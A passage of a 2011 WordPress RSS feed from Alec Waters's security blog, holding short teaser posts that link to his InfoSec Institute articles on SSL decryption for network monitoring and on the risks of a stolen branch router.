<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1290/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1290/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1290/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1290/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1290/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1290/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1290/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1290/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1290/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1290/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1290/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1290/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1290/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1290/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1290&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/07/13/the-spy-hunter-part-ii/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/07/homerhicks.png?w=150" medium="image">
			<media:title type="html">Donald Burgess, aka HomerHicks</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>Eyesight to the Blind &#8211; SSL Decryption for Network Monitoring</title>
		<link>http://wirewatcher.wordpress.com/2011/06/28/eyesight-to-the-blind-ssl-decryption-for-network-monitoring/</link>
		<comments>http://wirewatcher.wordpress.com/2011/06/28/eyesight-to-the-blind-ssl-decryption-for-network-monitoring/#comments</comments>
		<pubDate>Tue, 28 Jun 2011 09:36:51 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Crypto]]></category>
		<category><![CDATA[NSM]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1285</guid>
		<description><![CDATA[Here&#8217;s another post I wrote for the InfoSec Institute. This time, the article shows how to add SSL decryption to your NSM infrastructure, restoring the eyesight of sensors blinded by the use of SSL. You can read the article here; comments welcome, as always! Alec Waters is responsible for all things security at Dataline Software, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1285&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s another post I wrote for the <a href="http://resources.infosecinstitute.com" target="_blank">InfoSec Institute</a>. This time, the article shows how to add SSL decryption to your NSM infrastructure, restoring the eyesight of sensors blinded by the use of SSL.</p>
<p>You can <a href="http://resources.infosecinstitute.com/ssl-decryption/" target="_blank">read the article here</a>; comments welcome, as always!</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1285/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1285/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1285/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1285/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1285/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1285/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1285/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1285/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1285/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1285/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1285/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1285/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1285/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1285/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1285&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/06/28/eyesight-to-the-blind-ssl-decryption-for-network-monitoring/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>The Case of the Great Router Robbery</title>
		<link>http://wirewatcher.wordpress.com/2011/05/23/the-case-of-the-great-router-robbery/</link>
		<comments>http://wirewatcher.wordpress.com/2011/05/23/the-case-of-the-great-router-robbery/#comments</comments>
		<pubDate>Mon, 23 May 2011 18:47:10 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Information Leaks]]></category>
		<category><![CDATA[Networking]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1266</guid>
		<description><![CDATA[Here&#8217;s another post I wrote for the InfoSec Institute. What are the consequences for an enterprise if one of their branch routers is stolen? Read the article here &#8211; comments welcome! Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1266&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s another post I wrote for the <a href="http://resources.infosecinstitute.com" target="_blank">InfoSec Institute</a>. What are the consequences for an enterprise if one of their branch routers is stolen? Read the article <a href="http://j.mp/kFDMAX" target="_blank">here</a> &#8211; comments welcome!</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1266/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1266/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1266/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1266/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1266/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1266/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1266/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1266/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1266/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1266/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1266/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1266/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1266/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1266/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1266&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/05/23/the-case-of-the-great-router-robbery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
	</channel>
</rss>
